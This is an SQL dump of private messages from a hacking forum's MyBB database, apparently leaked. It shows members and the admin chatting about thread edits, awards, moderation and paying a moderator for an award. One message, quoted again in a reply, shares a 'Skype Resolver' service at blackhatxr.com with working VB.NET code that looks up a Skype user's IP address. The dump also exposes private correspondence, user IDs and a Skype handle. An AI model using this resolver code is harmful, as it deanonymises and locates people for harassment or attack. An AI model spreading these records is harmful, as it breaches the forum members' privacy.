finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks.\r\n\r\n[url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url]\r\n[/quote]\r\n\r\nI\'m kinda confused why it didn\'t let you edit. Can you make the elite group your default and try editing it? \r\n[/quote]\r\n\r\nOver 2800 minutes since i made it :p\r\n[/quote]\r\n\r\nI thought there was no time limit for upgraded lol.\r\n\r\nAnyway, thanks for reporting. \r\n[/quote]\r\n\r\nHey, are u sure normal members can see this? :\r\nhttp://l33thacking.com/forumdisplay.php?fid=53', '1345817615', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('495', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: My thread', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey.\r\nI made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks.\r\n\r\n[url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url]\r\n[/quote]\r\n\r\nI\'m kinda confused why it didn\'t let you edit. Can you make the elite group your default and try editing it? \r\n[/quote]\r\n\r\nOver 2800 minutes since i made it :p\r\n[/quote]\r\n\r\nI thought there was no time limit for upgraded lol.\r\n\r\nAnyway, thanks for reporting. \r\n[/quote]\r\n\r\nHey, are u sure normal members can see this? :\r\nhttp://l33thacking.com/forumdisplay.php?fid=53\r\n[/quote]\r\n\r\nYup, I just double checked and they can view it. ', '1345817748', '0', '3', '1345819747', '1', '0', '0', '1345819722'); INSERT INTO mybb_privatemessages VALUES('507', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: My thread', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey.\r\nI made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks.\r\n\r\n[url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url]\r\n[/quote]\r\n\r\nI\'m kinda confused why it didn\'t let you edit. Can you make the elite group your default and try editing it? \r\n[/quote]\r\n\r\nOver 2800 minutes since i made it :p\r\n[/quote]\r\n\r\nI thought there was no time limit for upgraded lol.\r\n\r\nAnyway, thanks for reporting. \r\n[/quote]\r\n\r\nHey, are u sure normal members can see this? :\r\nhttp://l33thacking.com/forumdisplay.php?fid=53\r\n[/quote]\r\n\r\nYup, I just double checked and they can view it. \r\n[/quote]\r\n\r\nOkay thanks', '1345819747', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('511', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: My thread', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey.\r\nI made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks.\r\n\r\n[url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url]\r\n[/quote]\r\n\r\nI\'m kinda confused why it didn\'t let you edit. Can you make the elite group your default and try editing it? \r\n[/quote]\r\n\r\nOver 2800 minutes since i made it :p\r\n[/quote]\r\n\r\nI thought there was no time limit for upgraded lol.\r\n\r\nAnyway, thanks for reporting. \r\n[/quote]\r\n\r\nHey, are u sure normal members can see this? :\r\nhttp://l33thacking.com/forumdisplay.php?fid=53\r\n[/quote]\r\n\r\nYup, I just double checked and they can view it. \r\n[/quote]\r\n\r\nOkay thanks\r\n[/quote]\r\n\r\nNo problem. By the way, nice signature. ', '1345820192', '0', '3', '1345821105', '1', '0', '0', '1345821076'); INSERT INTO mybb_privatemessages VALUES('516', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: My thread', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey.\r\nI made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks.\r\n\r\n[url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url]\r\n[/quote]\r\n\r\nI\'m kinda confused why it didn\'t let you edit. Can you make the elite group your default and try editing it? \r\n[/quote]\r\n\r\nOver 2800 minutes since i made it :p\r\n[/quote]\r\n\r\nI thought there was no time limit for upgraded lol.\r\n\r\nAnyway, thanks for reporting. \r\n[/quote]\r\n\r\nHey, are u sure normal members can see this? :\r\nhttp://l33thacking.com/forumdisplay.php?fid=53\r\n[/quote]\r\n\r\nYup, I just double checked and they can view it. \r\n[/quote]\r\n\r\nOkay thanks\r\n[/quote]\r\n\r\nNo problem. By the way, nice signature. \r\n[/quote]\r\n\r\nThanks ;) How do i get the award SWAG?', '1345821105', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('517', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: My thread', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey.\r\nI made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks.\r\n\r\n[url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url]\r\n[/quote]\r\n\r\nI\'m kinda confused why it didn\'t let you edit. Can you make the elite group your default and try editing it? \r\n[/quote]\r\n\r\nOver 2800 minutes since i made it :p\r\n[/quote]\r\n\r\nI thought there was no time limit for upgraded lol.\r\n\r\nAnyway, thanks for reporting. \r\n[/quote]\r\n\r\nHey, are u sure normal members can see this? :\r\nhttp://l33thacking.com/forumdisplay.php?fid=53\r\n[/quote]\r\n\r\nYup, I just double checked and they can view it. \r\n[/quote]\r\n\r\nOkay thanks\r\n[/quote]\r\n\r\nNo problem. By the way, nice signature. \r\n[/quote]\r\n\r\nThanks ;) How do i get the award SWAG?\r\n[/quote]\r\n\r\nYou have show us how cool you are or show some of your expensive clothes/shoes. You basically have to show how cool you look with expensive stuff. You would need to write your UID somewhere for proof. ', '1345821598', '0', '3', '1345821906', '1', '0', '0', '1345821811'); INSERT INTO mybb_privatemessages VALUES('518', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Skype API', '0', 'Hey there, here\'s a free Skype Resolver API.\r\n\r\nURL:\r\n[code]blackhatxr.com/skype2.php?skype=[/code]\r\n\r\nTo use, simply put the username of the Skype you wish to resolves after the \"?skype=\" GET in the URL.\r\n\r\nFor example:\r\n[code]blackhatxr.com/skype2.php?skype=echo123[/code]\r\n\r\n[code]\r\nPrivate Sub ReactorButton1_Click_1(ByVal sender As Object, ByVal e As EventArgs) Handles ReactorButton1.Click\r\n If (Me.ReactorTextBox1.Text = (\"furioz6\")) Then\r\n Me.Label2.Text = \"Black Listed\"\r\n Else\r\n WebRequest.Create(\"http://blackhatxr.com/skype2.php?skype=\" & Me.ReactorTextBox1.Text)\r\n Me.Label2.Text = New WebClient().DownloadString((\"http://blackhatxr.com/skype2.php?skype=\" & Me.ReactorTextBox1.Text))\r\n End If\r\n[/code]\r\n\r\nAny thanks is appreciated.\r\n\r\nEnjoy!', '1345821656', '0', '3', '1345821809', '1', '0', '0', '1345821758'); INSERT INTO mybb_privatemessages VALUES('522', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Skype API', '0', '[quote=\'t3h jok3r\']\r\nHey there, here\'s a free Skype Resolver API.\r\n\r\nURL:\r\n[code]blackhatxr.com/skype2.php?skype=[/code]\r\n\r\nTo use, simply put the username of the Skype you wish to resolves after the \"?skype=\" GET in the URL.\r\n\r\nFor example:\r\n[code]blackhatxr.com/skype2.php?skype=echo123[/code]\r\n\r\n[code]\r\nPrivate Sub ReactorButton1_Click_1(ByVal sender As Object, ByVal e As EventArgs) Handles ReactorButton1.Click\r\n If (Me.ReactorTextBox1.Text = (\"furioz6\")) Then\r\n Me.Label2.Text = \"Black Listed\"\r\n Else\r\n WebRequest.Create(\"http://blackhatxr.com/skype2.php?skype=\" & Me.ReactorTextBox1.Text)\r\n Me.Label2.Text = New WebClient().DownloadString((\"http://blackhatxr.com/skype2.php?skype=\" & Me.ReactorTextBox1.Text))\r\n End If\r\n[/code]\r\n\r\nAny thanks is appreciated.\r\n\r\nEnjoy!\r\n[/quote]\r\n\r\nlolol xD I just got this api on Hf 20 mins ago :P But thanks! :D\r\nBtw, am i able to edit the thread again?', '1345821809', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('524', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: My thread', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey.\r\nI made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks.\r\n\r\n[url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url]\r\n[/quote]\r\n\r\nI\'m kinda confused why it didn\'t let you edit. Can you make the elite group your default and try editing it? \r\n[/quote]\r\n\r\nOver 2800 minutes since i made it :p\r\n[/quote]\r\n\r\nI thought there was no time limit for upgraded lol.\r\n\r\nAnyway, thanks for reporting. \r\n[/quote]\r\n\r\nHey, are u sure normal members can see this? :\r\nhttp://l33thacking.com/forumdisplay.php?fid=53\r\n[/quote]\r\n\r\nYup, I just double checked and they can view it. \r\n[/quote]\r\n\r\nOkay thanks\r\n[/quote]\r\n\r\nNo problem. By the way, nice signature. \r\n[/quote]\r\n\r\nThanks ;) How do i get the award SWAG?\r\n[/quote]\r\n\r\nYou have show us how cool you are or show some of your expensive clothes/shoes. You basically have to show how cool you look with expensive stuff. You would need to write your UID somewhere for proof. \r\n[/quote]\r\n\r\nk. does a Anonymous mask work?', '1345821906', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('525', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Skype API', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\nHey there, here\'s a free Skype Resolver API.\r\n\r\nURL:\r\n[code]blackhatxr.com/skype2.php?skype=[/code]\r\n\r\nTo use, simply put the username of the Skype you wish to resolves after the \"?skype=\" GET in the URL.\r\n\r\nFor example:\r\n[code]blackhatxr.com/skype2.php?skype=echo123[/code]\r\n\r\n[code]\r\nPrivate Sub ReactorButton1_Click_1(ByVal sender As Object, ByVal e As EventArgs) Handles ReactorButton1.Click\r\n If (Me.ReactorTextBox1.Text = (\"furioz6\")) Then\r\n Me.Label2.Text = \"Black Listed\"\r\n Else\r\n WebRequest.Create(\"http://blackhatxr.com/skype2.php?skype=\" & Me.ReactorTextBox1.Text)\r\n Me.Label2.Text = New WebClient().DownloadString((\"http://blackhatxr.com/skype2.php?skype=\" & Me.ReactorTextBox1.Text))\r\n End If\r\n[/code]\r\n\r\nAny thanks is appreciated.\r\n\r\nEnjoy!\r\n[/quote]\r\n\r\nlolol xD I just got this api on Hf 20 mins ago :P But thanks! :D\r\nBtw, am i able to edit the thread again?\r\n[/quote]\r\n\r\nYou should be able to, please check and let me know. ', '1345821918', '0', '1', '0', '1', '0', '0', '1345822235'); INSERT INTO mybb_privatemessages VALUES('529', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: My thread', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey.\r\nI made a thread with my Skype ip finder, but the Api i used is down right now. I cant edit the post, so can you do it for me saying the Api is down and it doesnt work anymore? Thanks.\r\n\r\n[url=http://l33thacking.com/showthread.php?tid=130]Thread here[/url]\r\n[/quote]\r\n\r\nI\'m kinda confused why it didn\'t let you edit. Can you make the elite group your default and try editing it? \r\n[/quote]\r\n\r\nOver 2800 minutes since i made it :p\r\n[/quote]\r\n\r\nI thought there was no time limit for upgraded lol.\r\n\r\nAnyway, thanks for reporting. \r\n[/quote]\r\n\r\nHey, are u sure normal members can see this? :\r\nhttp://l33thacking.com/forumdisplay.php?fid=53\r\n[/quote]\r\n\r\nYup, I just double checked and they can view it. \r\n[/quote]\r\n\r\nOkay thanks\r\n[/quote]\r\n\r\nNo problem. By the way, nice signature. \r\n[/quote]\r\n\r\nThanks ;) How do i get the award SWAG?\r\n[/quote]\r\n\r\nYou have show us how cool you are or show some of your expensive clothes/shoes. You basically have to show how cool you look with expensive stuff. You would need to write your UID somewhere for proof. \r\n[/quote]\r\n\r\nk. does a Anonymous mask work?\r\n[/quote]\r\n\r\nWell umm that\'s unique. OK. ', '1345822066', '0', '1', '0', '1', '0', '0', '1345822243'); INSERT INTO mybb_privatemessages VALUES('537', '2', '82', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Hey', '0', '[quote=\'iTzIpod\']\r\nAre you the same Apathy that used to play Endacia?\r\n[/quote]\r\nNope ', '1345834874', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('542', '55', '82', '55', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Forum', '0', '[quote=\'iTzIpod\']\r\nAre you from a different forum?\r\n\r\nGK or LF?\r\n\r\nI think I saw you from a different forum. Or, someone has the same username as you. \r\n[/quote]\r\n\r\nI have been on many, not sure what GK and LF are.\r\n\r\nI\'m mostly active on HF tho', '1345845777', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('547', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'You have been granted an award.', '0', 'You have been granted the [b]SWAG[/b] award.', '1345847620', '0', '3', '1345848117', '0', '0', '0', '1345848055'); INSERT INTO mybb_privatemessages VALUES('549', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: You have been granted an award.', '0', '[quote=\'t3h jok3r\']\r\nYou have been granted the [b]SWAG[/b] award.\r\n[/quote]\r\n\r\nThanks :)', '1345848117', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('550', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: You have been granted an award.', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\nYou have been granted the [b]SWAG[/b] award.\r\n[/quote]\r\n\r\nThanks :)\r\n[/quote]\r\n\r\nNP. Enjoy!', '1345848191', '0', '1', '0', '1', '0', '0', '1345848510'); INSERT INTO mybb_privatemessages VALUES('552', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Awards', '0', 'Hey, take a look at my reply: http://l33thacking.com/showthread.php?tid=207', '1345852048', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('553', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Awards', '0', '[quote=\'HoverCatz\']\r\nHey, take a look at my reply: http://l33thacking.com/showthread.php?tid=207\r\n[/quote]\r\n\r\nThanks, but apathy takes care of the awards. Don\'t take me wrong, but I just migrated hosts and something went wrong so need to figure out what and fix it. ', '1345852232', '0', '3', '1345852341', '1', '0', '0', '1345852313'); INSERT INTO mybb_privatemessages VALUES('555', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Awards', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey, take a look at my reply: http://l33thacking.com/showthread.php?tid=207\r\n[/quote]\r\n\r\nThanks, but apathy takes care of the awards. Don\'t take me wrong, but I just migrated hosts and something went wrong so need to figure out what and fix it. \r\n[/quote]\r\n\r\nkk, good luck :)', '1345852341', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('557', '67', '2', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '2', 'Awards', '0', 'Hey :) Joker told me to msg u :P take a look at my reply: http://l33thacking.com/showthread.php?tid=207', '1345852411', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('559', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', 'http://l33thacking.com/member.php?action=profile&uid=82\r\n\r\nThis user should not have gotten the youtube award from just ripping my video and re uploading it. ', '1345852454', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('562', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\nhttp://l33thacking.com/member.php?action=profile&uid=82\r\n\r\nThis user should not have gotten the youtube award from just ripping my video and re uploading it. \r\n[/quote]\r\n\r\nI know, but upon request I will remove the award. Only when I get access to my admincp. While migrating, my server fucked up my ACP so I need to fix it. \r\n[/quote]\r\n\r\nI normally wouldn\'t mind but He asked me in PM if he could use my video and I said not if you\'re going to use my video to get the youtube award, He said hes not. And he did. That\'s my problem.', '1345852820', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('563', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Awards', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey, take a look at my reply: http://l33thacking.com/showthread.php?tid=207\r\n[/quote]\r\n\r\nThanks, but apathy takes care of the awards. Don\'t take me wrong, but I just migrated hosts and something went wrong so need to figure out what and fix it. \r\n[/quote]\r\n\r\nkk, good luck :)\r\n[/quote]\r\n\r\nThanks for the GL.\r\n\r\nBy the way, I received a complaint from the original YT uploader and would like your award removed. I can\'t deny them because the content is originally theirs. Sorry, but your award will be removed in a few days unless you can upload another video. ', '1345852979', '0', '1', '0', '1', '0', '0', '1345854000'); INSERT INTO mybb_privatemessages VALUES('566', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\nhttp://l33thacking.com/member.php?action=profile&uid=82\r\n\r\nThis user should not have gotten the youtube award from just ripping my video and re uploading it. \r\n[/quote]\r\n\r\nI know, but upon request I will remove the award. Only when I get access to my admincp. While migrating, my server fucked up my ACP so I need to fix it. \r\n[/quote]\r\n\r\nI normally wouldn\'t mind but He asked me in PM if he could use my video and I said not if you\'re going to use my video to get the youtube award, He said hes not. And he did. That\'s my problem.\r\n[/quote]\r\n\r\nOK, but if I tell him to take your permission now, would it be OK? \r\n[/quote]\r\n\r\nAslong ask he doesn\'t have the award from my video I don\'t care. That\'s like me just copying everyones tutorials on here and claiming them as mine.', '1345853321', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('573', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Sorry .', '0', '[quote=\'iTzIpod\']\r\nYou have been granted an award. \r\nTo: iTzIpod\r\nYou have been granted the Youtube award. Even though you downloaded someone elses work, you made the effort and took out time to specially upload it for LH.\r\n[/quote]\r\n\r\nI have removed the rep, If the award isn\'t gone soon. Ill be checking It will be re updated.\r\n\r\nI have talked to him about it aswell.', '1345853606', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('574', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'WAIT WAIT WAIT', '0', 'The award thing I told you saying that it will be get removed was not for you. I mistakenly sent it to you. ', '1345853664', '0', '3', '1345854131', '1', '0', '0', '1345854022'); INSERT INTO mybb_privatemessages VALUES('576', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', 'Alright thank you. Sorry to bother you for this it just got to me in the wrong way. After I discussed with him that he shouldn\'t have the award from my work and he did it anyways.', '1345853668', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('582', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', 'Alright aha, And anyways. When do you think the gaming section will be up?\r\n', '1345853962', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('585', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: WAIT WAIT WAIT', '0', '[quote=\'t3h jok3r\']\r\nThe award thing I told you saying that it will be get removed was not for you. I mistakenly sent it to you. \r\n[/quote]\r\n\r\nyeah it didnt look like it was meant for me :p', '1345854131', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('586', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: WAIT WAIT WAIT', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\nThe award thing I told you saying that it will be get removed was not for you. I mistakenly sent it to you. \r\n[/quote]\r\n\r\nyeah it didnt look like it was meant for me :p\r\n[/quote]\r\n\r\nLol Sorry though. ', '1345854258', '0', '1', '0', '1', '0', '0', '1345890465'); INSERT INTO mybb_privatemessages VALUES('594', '55', '82', '55', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Forum', '0', '[quote=\'iTzIpod\']\r\n[quote=\'Baws\']\r\n[quote=\'iTzIpod\']\r\nAre you from a different forum?\r\n\r\nGK or LF?\r\n\r\nI think I saw you from a different forum. Or, someone has the same username as you. \r\n[/quote]\r\n\r\nI have been on many, not sure what GK and LF are.\r\n\r\nI\'m mostly active on HF tho\r\n[/quote]\r\n\r\nDon\'t you play a game called Maplestory?\r\n[/quote]\r\n\r\nnope', '1345857788', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('597', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\nAlright aha, And anyways. When do you think the gaming section will be up?\r\n\r\n[/quote]\r\n\r\nI believe in 10 days. BTW, I\'m adding a Group section. Give it a few minz and if you want to make a group then apply in the thread. \r\n[/quote]\r\n\r\nWell If I moderate the gaming section, Ill probably make a gaming group and run it if you don\'t mind.\r\n', '1345859276', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('607', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\nAlright aha, And anyways. When do you think the gaming section will be up?\r\n\r\n[/quote]\r\n\r\nI believe in 10 days. BTW, I\'m adding a Group section. Give it a few minz and if you want to make a group then apply in the thread. \r\n[/quote]\r\n\r\nWell If I moderate the gaming section, Ill probably make a gaming group and run it if you don\'t mind.\r\n\r\n[/quote]\r\n\r\nYeah, I don\'t think it would be a problem because I will be picking another Moderator to help you along. \r\n[/quote]\r\n\r\nAlright.', '1345860988', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('611', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Access', '0', '[quote=\'t3h jok3r\']\r\nI need your new info to access ACP. The secret pin is the same. \r\n[/quote]\r\n\r\nYou mean my user and pass?', '1345865381', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('617', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: (:', '0', 'Oh i\'m not mad at you don\'t worry aha. joker pretty much told me all that happend.\r\n\r\nIll be running a gaming group soon. Ill make sure you\'re one of the co leaders :)', '1345867605', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('625', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Mod', '0', '[quote=\'iTzIpod\']\r\nI might become a Moderator or LH.\r\n[/quote]\r\n\r\nCongrats man.', '1345868342', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('629', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Mod', '0', '[quote=\'iTzIpod\']\r\n[quote=\'NXK\']\r\n[quote=\'iTzIpod\']\r\nI might become a Moderator or LH.\r\n[/quote]\r\n\r\nCongrats man.\r\n[/quote]\r\n\r\nThanks.\r\n\r\n\r\nOh and about that Youtube video of yours, \r\n\r\n\r\nDo you want me to remove it>?\r\n[/quote]\r\n\r\nNo it\'s fine.', '1345868434', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('631', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'hey', '0', 'hello :)\r\n\r\nskype: SamJKendall', '1345870391', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('637', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: hey', '0', '[quote=\'iTzIpod\']\r\n[quote=\'Kennerz\']\r\nhello :)\r\n\r\nskype: SamJKendall\r\n[/quote]\r\n\r\nSorry bout that. I am currently busy and not on right now. Add me though\r\n\r\n\r\nSkype: iTzIpod\r\n\r\nNew laptop.. -.-\r\n[/quote]\r\n\r\nokay will add and yeah no problem. ', '1345872344', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('652', '67', '61', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Award', '0', 'Hey :)\r\nHow do i get the Kind award? You [b]are[/b] the best moderator in my eyes :P I have 5$ i can donate to u :)', '1345908078', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('653', '67', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Award', '0', '[quote=\'HoverCatz\']\r\nHey :)\r\nHow do i get the Kind award? You [b]are[/b] the best moderator in my eyes :P I have 5$ i can donate to u :)\r\n[/quote]\r\n\r\nIf you donate 5$ to me I tell teh joker that you have done it. And you will get the award.', '1345914635', '0', '3', '1345916151', '0', '0', '2', '1345916070'); INSERT INTO mybb_privatemessages VALUES('654', '61', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Re: Award', '0', '[quote=\'HoverCatz\']\r\nHey :)\r\nHow do i get the Kind award? You [b]are[/b] the best moderator in my eyes :P I have 5$ i can donate to u :)\r\n[/quote]\r\n\r\nIf you donate 5$ to me I tell teh joker that you have done it. And you will get the award.', '1345914635', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('657', '67', '61', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Award', '0', '[quote=\'NXK\']\r\n[quote=\'HoverCatz\']\r\nHey :)\r\nHow do i get the Kind award? You [b]are[/b] the best moderator in my eyes :P I have 5$ i can donate to u :)\r\n[/quote]\r\n\r\nIf you donate 5$ to me I tell teh joker that you have done it. And you will get the award.\r\n[/quote]\r\n\r\nk :P whats ur paypal?', '1345916151', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('658', '67', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Award', '0', 